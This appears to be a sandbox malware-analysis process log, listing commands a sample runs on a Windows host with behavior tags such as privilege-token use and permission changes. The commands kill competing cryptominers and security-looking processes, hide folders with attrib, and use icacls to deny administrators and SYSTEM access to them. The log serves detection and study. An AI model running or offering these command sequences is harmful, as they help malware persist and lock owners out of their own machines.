- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\microsoft\Speech\"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\Speech" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM coretempapp.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\coretempapp"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\coretempapp" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM kryptex.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM kryptex7.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\kryptex"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\kryptex" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM generictools.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM digitalsearch.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\local\generictools"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\local\generictools" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\steam"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\steam" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM esif.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\esif.exe" /deny Admin:(D,F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM muxu.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM muxu.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM CEF.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM CEF.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Cefunpacked\ /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\temp\System324⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\temp\Windowstask4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\temp\Windowstask /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\temp\System32 /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\temp\System32\Logs4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\temp\Windowstask4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\temp4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\temp\Windowstask /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\temp\System32\Logs /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windefender.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel1.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nvidiahelp.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM taskhost.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nvidiadriver.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\roaming\system"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\system" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\MicrosoftCorporation"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\MicrosoftCorporation" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel1.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM taskhost.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\appdata\roaming\WindowsApps4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\WindowsApps" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM systemcore.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\appdata\roaming\windowshelper4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\windowshelper" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM defender.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM winmgmnt.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "D:\Windowsdata"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Windowsdata"4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "E:\Windowsdata"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "K:\Windowsdata"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "D:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "E:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "K:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM webservice.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM securedisk.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\disk4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\disk" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM systemprocess.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\appdata\roaming\systemprocess4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\systemprocess" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM defender.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\microsoft\windows defender" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM debugger.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\appdata\roaming\microsoft\network"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\network" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM gplyra.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\appdata\roaming\gplyra"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\gplyra" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM run.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\tiser"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\tiser" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nettrans.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\prefssecure"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\prefssecure" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM net.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM net1.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM SYSTEM.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\windowshelper" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\intel" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\app" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nscpucnminer.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\windows\min"4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\min\ /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ErrorCheck.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Mikile /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM booster.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM unityp.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM booster.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hoststore.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdeffenders.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\windows\hs_moduler4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\hs_module" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM dvjyy.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostsys.exe /T /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\programdata\oracle4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\oracle" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM booster.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\PCBooster4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nheqminer.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msminer.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM winlog.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\systemcare4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Windows System Driver.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Windows Driver.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "COM Surrogate.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "system.exe" /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "security.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Framework /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Framework /deny system:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AMD.exe /T /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\AMD /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\AMD /deny system:(OI)(CI)(F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nssm.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmarin.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wupdate.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\wupdate4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM SIVapp.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\SIVapp4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM Kyubey.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\kyubey4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM mel.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\QIPapp4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\QIPapp /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM NSCPUCNMINER64.EXE /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM img002.EXE /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\NSCPUCNMINER4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM monotype.exe /T /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\local\monotype4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\monotype /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xpon.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\local\xpon4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\xpon /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\xpon /deny system:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmrig.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\isminer4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM security.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM comdev.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\comdev4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wmipr.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\wmipr4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM defender.exe /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM winmgmnt.exe /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windowsdata4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM dlhosta.exe /F4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\performance" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\windows\system" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\AudioHDriver"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\AudioHDriver" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\AudioDriver"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\AudioDriver" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM vshub.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM vsnhub.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM erenhub.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioHD.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioDriver.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM penapen.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\AudioHDriver"4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Programdata\AudioDriver"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\Sysfiles"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AudioDriver" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appData\Roaming\Sysfiles" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appData\Roaming\AudioHDriver" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdriver.exe /T /F4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdriver.exe /T /F4⤵
